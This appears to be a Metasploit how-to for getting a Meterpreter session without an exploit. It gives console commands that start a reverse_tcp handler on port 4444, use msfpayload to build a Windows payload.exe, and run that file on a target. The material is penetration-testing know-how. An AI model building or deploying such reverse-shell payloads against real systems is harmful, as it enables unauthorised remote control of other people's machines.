Use Meterpreter Locally Without an Exploit

Metasploit Pro

Create a new project, click on Campaigns, create a new Campaign, enable the USB Campaign and configure the listener port. At this point, save the campaign, start it, then download the executable from the provided link. The session will now appear in the Sessions tab.

Alternatively, access Global Settings from the Administration menu and configure a new Persistent Listener through this interface, choosing the type of payload you want this listener to support (reverse_tcp, reverse_https, etc). Once the listener is setup, see the steps below for the Metasploit Framework to create the executable.

The steps listed below for Metasploit Community and Metasploit Framework can also be used without leveraging the Campaign feature in Metasploit Pro.

Metasploit Framework

Open a Metasploit Console by first launchign the console from the Start Menu on Windows or using the "msfpro" or "msfconsole" links on Linux. Once the console is open, enter the following commands:

msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST exploit(handler) > set LPORT 4444msf exploit(handler) > set ExitOnSession falsemsf exploit(handler) > exploit -j

This will run a handler listener in the background. Change to whatever your machine's IP is, but do not set this to (this is special cased in Metasploit). Once the listener is running, its time to generate the actual payload.

Open a command shell with access to the Metasploit environment. On Windows, this is a link to the System Console, on Linux this is /opt/metasploit-4.1.2/diagnostic_shell. Linux users may not need to do this at all if msfconsole is already within their path.

From the shell, execute the following command:

WindowsC:\metasploit > ruby msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > payload.exe

Linux$ msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > payload.exe

Copy this EXE to your intended target and execute it. The session will be visible with the Metasploit Console (or in the Sessions tab if you used one of the commercial or community products to create the listener)